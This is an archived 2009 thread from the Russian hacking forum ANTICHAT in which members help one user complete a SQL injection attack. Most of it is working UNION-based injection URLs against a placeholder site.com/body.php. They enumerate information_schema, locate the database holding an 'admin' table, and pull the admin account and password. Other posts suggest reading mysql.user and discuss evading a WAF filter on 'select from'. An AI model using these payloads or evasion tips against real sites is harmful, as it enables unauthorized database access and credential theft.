ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.06.2009, 20:54
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
В какой бд таблица admin?
|
|
|

20.06.2009, 20:55
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
2 Adm1n4eG
try
http://site.com/body.php?id=-1+union+all+select+1,2,3,concat(0x3a,table_name,0x 3a,table_schema),5,6,7,8+from+i nformation_schema.tables+limit+1,1--
|
|
|

20.06.2009, 20:57
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Тогда уж лимит+17,1
Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html
Читай там вопрос номер 3.
|
|
|

20.06.2009, 20:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Тебе же сказали:
1. http://site.com/body.php?id=-1+union+all+select+1,2,3,count(*),5,6,7,8+from+adm in--
- подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица
2. . http://site.com/body.php?id=-1+union+all+select+1,2,3,table_schema+from+informa tion_schema.columns+where+table_name=0x61646d696e
- узнай точную БД, где находится табла admin, может просто не в текущей БД, а потом делай запросы подставляя сначала название_бд.admin
3. unhex(hex(данные)), aes_decrypt(aes_encrypt(данные)) - просто несповпадение кодировок, в общем проверяй
4. Просто нет прав на чтение данной таблицы у текущего юзера
Последний раз редактировалось Pashkela; 20.06.2009 в 21:13..
|
|
|

20.06.2009, 21:32
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме: 1191962
Репутация:
39
|
|
Тож забыл сразу сказать в таблице admin есть 2 колонки account и pwd но почему то при проверке count(*) все равно появилась ошибка...
R1dex большое спасибо!!!
Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html
Читай там вопрос номер 3.
эт я както упустил )))
все таки оказалось что таблица находится не в той базе с которой работает скрип
проверил это таким образом:
http://site.com/body.php?id=-1+union+select+1,2,3,table_schema,5,6,7,8+from+inf ormation_schema.tables+where+table_name=0x61646d69 6e--
Запрос выдал: bwbvdisk
Итоговый запрос и получение админского логина и пасса:
http://site.com/body.php?id=-1+union+all+select+1,2,3,concat_ws(char(58),accoun t,pwd),5,6,7,8+from+bwbvdisk.admin+limit+0,1--
Всем кто помогал спс!
|
|
|

20.06.2009, 23:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица
ну вообще если в таблице нет ниодной записи ошибки не будет, а на страницу выведуться null'и
пробуй select user from mysql.user limit 9999999
|
|
|

21.06.2009, 01:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Можно ли в подзапросах обойтись без использования from? Union фильтруется,как и from
|
|
|

21.06.2009, 01:52
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
нет, искать обход фильтра
|
|
|

21.06.2009, 01:55
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
какой обход? фильтрация всей конструкции select from
|
|
|

21.06.2009, 01:57
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Если встречается select from подряд,то форбидн.А вот если from select или отдельно,то нет.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|